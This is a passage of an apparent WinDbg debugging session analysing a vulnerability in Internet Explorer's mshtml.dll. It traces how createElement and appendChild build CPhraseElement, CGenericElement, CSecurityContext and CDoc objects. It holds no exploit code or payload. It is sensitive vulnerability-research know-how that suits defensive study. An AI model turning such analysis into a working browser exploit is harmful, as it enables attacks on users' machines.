eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be6 esp=0425e658 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x40:
6a234be6 push edi
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be7 esp=0425e654 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x41:
6a234be7 ffd0 call eax {mshtml!CPhraseElement::CreateElement (6a269f4b)}
:> ln eax
(6a269f4b) mshtml!CPhraseElement::CreateElement | (6a269fdd) mshtml!FindPeer
Exact matches:
mshtml!CPhraseElement::CreateElement = <no type information>

So var id_0 = document.createElement("sup"); leads to the creation of a CPhraseElement object.

bu mshtml!CElement::CElement

Let's look at the contents of this object, although it probably has little to do with triggering the vulnerability:

:> p
Breakpoint hit
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a23480f esp=0425e638 ebp=0425e64c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement:
6a23480f 8bff mov edi,edi
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234811 esp=0425e638 ebp=0425e64c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x2:
6a234811 push ebp
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234812 esp=0425e634 ebp=0425e64c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x3:
6a234812 8bec mov ebp,esp
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234814 esp=0425e634 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x5:
6a234814 push ebx
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234815 esp=0425e630 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x6:
6a234815 8b5d0c mov ebx,dword ptr [ebp+0Ch] ss::0425e640=05ad0680
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234818 esp=0425e630 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x9:
6a234818 push esi
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234819 esp=0425e62c ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xa:
6a234819 push edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a23481a esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xb:
6a23481a 8bf8 mov edi,eax
:> dd eax
1af02fd8
1af02fe8
1af02ff8 ???????? ????????
1af03008 ???????? ???????? ???????? ????????
1af03018 ???????? ???????? ???????? ????????
1af03028 ???????? ???????? ???????? ????????
1af03038 ???????? ???????? ???????? ????????
1af03048 ???????? ???????? ???????? ????????
:> p
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=1af02fd8
eip=6a23481c esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xd:
6a23481c 8bf7 mov esi,edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=1af02fd8
eip=6a23481e esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xf:
6a23481e e80c300800 call mshtml!CBase::CBase (6a2b782f)
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234823 esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x14:
6a234823 and dword ptr [edi+24h], ds::1af02ffc=
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234827 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x18:
6a234827 c707b0540f6a mov dword ptr [edi],offset mshtml!CElement::`vftable' (6a0f54b0) ds:0023:1af02fd8={mshtml!CEncode::`vftable' (6a2b785c)}
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a23482d esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x1e:
6a23482d 8b03 mov eax,dword ptr [ebx] ds::05ad0680={mshtml!CDoc::`vftable' (6a2a1e88)}
:>
eax=6a2a1e88 ebx=05ad0680 ecx=6a6251a0 edx= esi=1af02fd8 edi=1af02fd8
eip=6a23482f esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x20:
6a23482f 8bcb mov ecx,ebx
:>
eax=6a2a1e88 ebx=05ad0680 ecx=05ad0680 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234831 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x22:
6a234831 ff5070 call dword ptr [eax+70h] ds::6a2a1ef8={mshtml!CDoc::SecurityContext (6a234733)}
:>
eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx= esi=1af02fd8 edi=1af02fd8
eip=6a234834 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x25:
6a234834 8bf0 mov esi,eax
:>
eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx= esi=074befe8 edi=1af02fd8
eip=6a234836 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x27:
6a234836 e828000000 call mshtml!CElement::ReplaceSecurityContext (6a234863)
:>
eax= ebx=05ad0680 ecx=6a2a92e1 edx= esi=074befe8 edi=1af02fd8
eip=6a23483b esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x2c:
6a23483b add dword ptr [ebx+], ds::05ad0688=000000a0
:>
eax= ebx=05ad0680 ecx=6a2a92e1 edx= esi=074befe8 edi=1af02fd8
eip=6a23483f esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x30:
6a23483f e8123d0800 call mshtml!_IncrementObjectCount (6a2b8556)
:>
eax=0000003b ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234844 esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x35:
6a234844 8a4508 mov al,byte ptr [ebp+] ss::0425e63c=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234847 esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x38:
6a234847 81671cfffffbff and dword ptr [edi+1Ch],0FFFBFFFFh ds::1af02ff4=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a23484e esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x3f:
6a23484e 806720fe and byte ptr [edi+20h],0FEh ds::1af02ff8=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234852 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x43:
6a234852 mov byte ptr [edi+18h],al ds::1af02ff0=
:>
eax= ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234855 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x46:
6a234855 8bc7 mov eax,edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=1af02fd8
eip=6a234857 esp=0425e628 ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x48:
6a234857 5f pop edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx= esi=074befe8 edi=
eip=6a234858 esp=0425e62c ebp=0425e634 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x49:
6a234858 5e pop esi
:> dd eax
1af02fd8 6a0f54b0
1af02fe8
1af02ff8 074befe8 ???????? ????????
1af03008 ???????? ???????? ???????? ????????
1af03018 ???????? ???????? ???????? ????????
1af03028 ???????? ???????? ???????? ????????
1af03038 ???????? ???????? ???????? ????????
1af03048 ???????? ???????? ???????? ????????
:> ln 6a0f54b0
(6a0f54b0) mshtml!CElement::`vftable' | (6a1008c0) mshtml!CShape::`vftable'
Exact matches:
mshtml!CElement::`vftable' = <no type information>
:> dd 074befe8
074befe8 6a2a8c34 05ad0680
074beff8 ???????? ????????
074bf008 ???????? ???????? ???????? ????????
074bf018 ???????? ???????? ???????? ????????
074bf028 ???????? ???????? ???????? ????????
074bf038 ???????? ???????? ???????? ????????
074bf048 ???????? ???????? ???????? ????????
074bf058 ???????? ???????? ???????? ????????
:> ln 6a2a8c34
(6a2a8c34) mshtml!CSecurityContext::`vftable' | (6a2a8c44) mshtml!CInvalidatedSecurityContext::`vftable'
Exact matches:
mshtml!CSecurityContext::`vftable' = <no type information>

This shows the CPhraseElement object after initialization; interestingly, at offset 0x28 of the object there is a pointer to a CSecurityContext object.

:> g
Breakpoint hit
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi
:> p
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x2:
6a234bb2 push ebp
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3:
6a234bb3 8bec mov ebp,esp
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x5:
6a234bb5 83ec10 sub esp,10h
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x8:
6a234bb8 push ebx
:>
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x9:
6a234bb9 8b5d10 mov ebx,dword ptr [ebp+10h] ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bbc esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xc:
6a234bbc push esi
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bbd esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xd:
6a234bbd c7451000000000 mov dword ptr [ebp+10h], ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x14:
6a234bc4 85db test ebx,ebx
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x16:
6a234bc6 0f84c67d0300 je mshtml!CreateElement+0x18 (6a26c992) [br=]
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a26c992 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x18:
6a26c992 bb08832a6a mov ebx,offset mshtml!g_Zero (6a2a8308)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a26c997 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a26c997 e93082fcff jmp mshtml!CreateElement+0x1d (6a234bcc)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bcc esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a234bcc 0fb64701 movzx eax,byte ptr [edi+] ds::0425e6a9=
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x21:
6a234bd0 c1e004 shl eax,
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x24:
6a234bd3 05709a2c6a add eax,offset mshtml!g_atagdesc (6a2c9a70)
:>
eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x29:
6a234bd8 0f84b34e1500 je mshtml!CreateElement+0x2b (6a389a91) [br=]
:> p
eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234bde esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x38:
6a234bde 8b4008 mov eax,dword ptr [eax+] ds::6a2ca1c8={mshtml!CGenericElement::CreateElement (6a11c234)}
:>
eax=6a11c234 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be1 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3b:
6a234be1 8d4d10 lea ecx,[ebp+10h]
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3e:
6a234be4 push ecx
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be5 esp=0425e65c ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3f:
6a234be5 push edx
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be6 esp=0425e658 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x40:
6a234be6 push edi
:>
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi= edi=0425e6a8
eip=6a234be7 esp=0425e654 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x41:
6a234be7 ffd0 call eax {mshtml!CGenericElement::CreateElement (6a11c234)}
:> ln eax
(6a11c234) mshtml!CGenericElement::CreateElement | (6a11c279) mshtml!CGenericElement::CGenericElement
Exact matches:
mshtml!CGenericElement::CreateElement = <no type information>

So var id_1 = document.createElement("audio"); results in the creation of a CGenericElement object.

:> g
Breakpoint hit
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx= esi=0425e6a8 edi=0425e6a8
eip=6a23480f esp=0425e614 ebp=0425e638 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement:
6a23480f 8bff mov edi,edi
:> p
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx= esi=0425e6a8 edi=0425e6a8
eip=6a234811 esp=0425e614 ebp=0425e638 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x2:
6a234811 push ebp
:>
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx= esi=0425e6a8 edi=0425e6a8
eip=6a234812 esp=0425e610 ebp=0425e638 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x3:
6a234812 8bec mov ebp,esp
:> dd eax
07824fc8
07824fd8
07824fe8
07824ff8 ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????

This is the base-class constructor that the CGenericElement object inherits. There is no need to single-step it to the return, because for every instance of a subclass of CElement the initialization is the same, except for the flag value at offset 0x24 that indicates the type.

:> g
Breakpoint hit
eax= ebx=0425e960 ecx= edx= esi=0425e950 edi=0425e950
eip=6c77d67f esp=0425e834 ebp=0425e870 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!cos:
6c77d67f ff259010756c jmp dword ptr [jscript!_imp__cos (6c751090)] ds::6c751090={msvcrt!cos (773d8ace)}

This one is interesting; note the breakpoints I set:

:> bl
e 6c77d8c0 () :**** jscript!tan
e 6a23d88c () :**** mshtml!CreateElement
e 6a234bb0 () :**** mshtml!CreateElement
e 6c77d67f () :**** jscript!cos
e 6a1f20c4 () :**** mshtml!CElement::appendChild
e 6a2bced0 () :**** mshtml!CTreeNode::CTreeNode
e 6a23480f () :**** mshtml!CElement::CElement

Common knowledge says that CxxxElement objects and CTreeNode objects correspond one to one, but here you can see that creating an element does not necessarily create a CTreeNode.

:> g
Breakpoint hit
eax=15284fd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi= edi=
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::appendChild:
6a1f20c4 8bff mov edi,edi
:> dd esp
0425e7c8 6a1f1436 150e3fd0 1b1dcfd8 0425e850
0425e7d8 176bafd0 6a1f13ba 6a2ae458 a9ca0dc9
0425e7e8 9bcb0009 1b1dcfd8
0425e7f8 0425e86c 6a32235c 150e3fd0 176bafd0
0425e808 15284fd8 0000004c 6a2ae458
0425e818 0425ea40 0425e848 176bafd0
0425e828 0dbb001b
0425e838 0000004c 15284fd8
:> dd 150e3fd0
150e3fd0 6a246670 07701fe8
150e3fe0 071fae80 15171fb0 8202e280
150e3ff0 104d4f00 d0d0d0d0
150e4000 ???????? ???????? ???????? ????????
150e4010 ???????? ???????? ???????? ????????
150e4020 ???????? ???????? ???????? ????????
150e4030 ???????? ???????? ???????? ????????
150e4040 ???????? ???????? ???????? ????????
:> ln 6a246670
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
:> dd 1b1dcfd8
1b1dcfd8 6a627f68 6a2d2fa8 1af02fd8
1b1dcfe8 6a2aaadc
1b1dcff8 ???????? ????????
1b1dd008 ???????? ???????? ???????? ????????
1b1dd018 ???????? ???????? ???????? ????????
1b1dd028 ???????? ???????? ???????? ????????
1b1dd038 ???????? ???????? ???????? ????????
1b1dd048 ???????? ???????? ???????? ????????
:> ln 6a627f68
(6a627f68) mshtml!s_apfnTrackerTearoffVtable | (6a6280a0) mshtml!s_fontFamilyMap
Exact matches:
mshtml!s_apfnTrackerTearoffVtable = <no type information>

It can be seen that the first argument of CElement::appendChild is the parent object being appended to (body).

:> t
eax=150e3fd0 ebx=6a628b0c ecx= edx= esi=1b1dcfd8 edi=0425e850
eip=6a1f2170 esp=0425e76c ebp=0425e784 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper:
6a1f2170 8bff mov edi,edi
:> kv
ChildEBP RetAddr Args to Child
0425e768 6a1f2148 1b1dcfd8 0425e7a4 mshtml!CElement::InsertBeforeHelper
0425e784 6a1f20fe 150e3fd0 1b1dcfd8 mshtml!CElement::insertBefore+0x3c
0425e7c4 6a1f1436 150e3fd0 1b1dcfd8 0425e850 mshtml!CElement::appendChild+0x3a
0425e7f8 6a32235c 150e3fd0 176bafd0 15284fd8 mshtml!Method_IDispatchpp_IDispatchp+0xcb
0425e86c 6a32c75a 150e3fd0 mshtml!CBase::ContextInvokeEx+0x5dc
0425e8bc 6a32c79a 150e3fd0 mshtml!CElement::ContextInvokeEx+0x9d
0425e8e8 6a2d3104 150e3fd0 mshtml!CInput::VersionedInvokeEx+0x2d
0425e93c 6c75a22a 06fa2fd8 mshtml!PlainInvokeEx+0xeb
0425e978 6c75a175 1a6c4d10 jscript!IDispatchExInvokeEx2+0x104
0425e9b4 6c75a3f6 1a6c4d10 jscript!IDispatchExInvokeEx+0x6a
0425ea74 6c75a4a0 jscript!InvokeDispatchEx+0x98
0425eaa8 6c76d8c8 1a6c4d10 0425eadc jscript!VAR::InvokeByName+0x139
0425eaf4 6c76d96f 1a6c4d10 jscript!VAR::InvokeDispName+0x7d
0425eb20 6c76e3e7 1a6c4d10 jscript!VAR::InvokeByDispID+0xce

From the arguments shown in the backtrace it is clear that the upper frames are just thin wrappers (the original first argument is passed in eax); the real work is done by CElement::InsertBeforeHelper.

:>
eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx= esi=150e3fd0 edi=
eip=6a1f218d esp=0425e710 ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0x1d:
6a1f218d e86ea20b00 call mshtml!CElement::Doc (6a2ac400)

The first thing this function calls is CElement::Doc, and only ecx is passed down to it.

; public: class CDoc * __thiscall CElement::Doc(void)const
?Doc@CElement@@QBEPAVCDoc@@XZ proc near
mov eax, [ecx]
mov edx, [eax+70h]
call edx
mov eax, [eax+0Ch]
retn
?Doc@CElement@@QBEPAVCDoc@@XZ endp

As you can see, it simply calls one of the object's virtual functions and then reads a value through the returned pointer.

:> t
eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx= esi=150e3fd0 edi=
eip=6a2ac400 esp=0425e70c ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc:
6a2ac400 8b01 mov eax,dword ptr [ecx] ds::150e3fd0={mshtml!CBodyElement::`vftable' (6a246670)}
:>
eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx= esi=150e3fd0 edi=
eip=6a2ac402 esp=0425e70c ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x2:
6a2ac402 8b5070 mov edx,dword ptr [eax+70h] ds::6a2466e0={mshtml!CElement::SecurityContext (6a2ac3d0)}
:>
eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx=6a2ac3d0 esi=150e3fd0 edi=
eip=6a2ac405 esp=0425e70c ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x5:
6a2ac405 ffd2 call edx {mshtml!CElement::SecurityContext (6a2ac3d0)}
:> ln eax
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>

ecx is still the body (the parent object).

:> p
eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x7:
6a2ac407 8b400c mov eax,dword ptr [eax+0Ch] ds::18b1cff4=05ad0680
:> dd eax
18b1cfe8 6a2a8c34 05ad0680
18b1cff8 06d62f30 ???????? ????????
18b1d008 ???????? ???????? ???????? ????????
18b1d018 ???????? ???????? ???????? ????????
18b1d028 ???????? ???????? ???????? ????????
18b1d038 ???????? ???????? ???????? ????????
18b1d048 ???????? ???????? ???????? ????????
18b1d058 ???????? ???????? ???????? ????????
:> ln poi(eax)
(6a2a8c34) mshtml!CSecurityContext::`vftable' | (6a2a8c44) mshtml!CInvalidatedSecurityContext::`vftable'
Exact matches:
mshtml!CSecurityContext::`vftable' = <no type information>

This is the return value after the call; the object returned is actually a CSecurityContext.

:> p
eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0x7:
6a2ac407 8b400c mov eax,dword ptr [eax+0Ch] ds::18b1cff4=05ad0680
:> p
eax=05ad0680 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a2ac40a esp=0425e70c ebp=0425e768 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::Doc+0xa:
6a2ac40a c3 ret
:> dd eax
05ad0680 6a2a1e88 000000b0
05ad0690 6a2bb610 05ad0680 054aeb8c
05ad06a0 000040a8 000021e6 054aeba8
05ad06b0 077d5f88
05ad06c0
05ad06d0 07560fc8 04ea8870
05ad06e0 13fbded8
05ad06f0 0000001d
:> ln poi(eax)
(6a2a1e88) mshtml!CDoc::`vftable' | (6a2bb610) mshtml!CDoc::`vftable'
Exact matches:
mshtml!CDoc::`vftable' = <no type information>

The value at offset 0xC of the CSecurityContext object is returned, and resolving the symbol shows that this thing is actually a pointer to a CDoc object. In other words, CElement::Doc simply returns the address of mshtml!Doc; the Doc object represents the root of the whole HTML DOM tree, i.e. <html></html>.

:>
eax=0425e71c ebx=6a628b0c ecx=150e3fd0 edx=6a2ac916 esi=150e3fd0 edi=
eip=6a1f21a6 esp=0425e710 ebp=0425e768 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0x3c:
6a1f21a6 e8deab0b00 call mshtml!CElement::GetWindowedMarkupContext (6a2acd89)
:>
eax=06d62f30 ebx=6a628b0c ecx= edx=6a2ac8f9 esi=150e3fd0 edi=
eip=6a1f21ab esp=0425e710 ebp=0425e768 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0x41:
6a1f21ab 8bd8 mov ebx,eax
:> ln poi(eax)
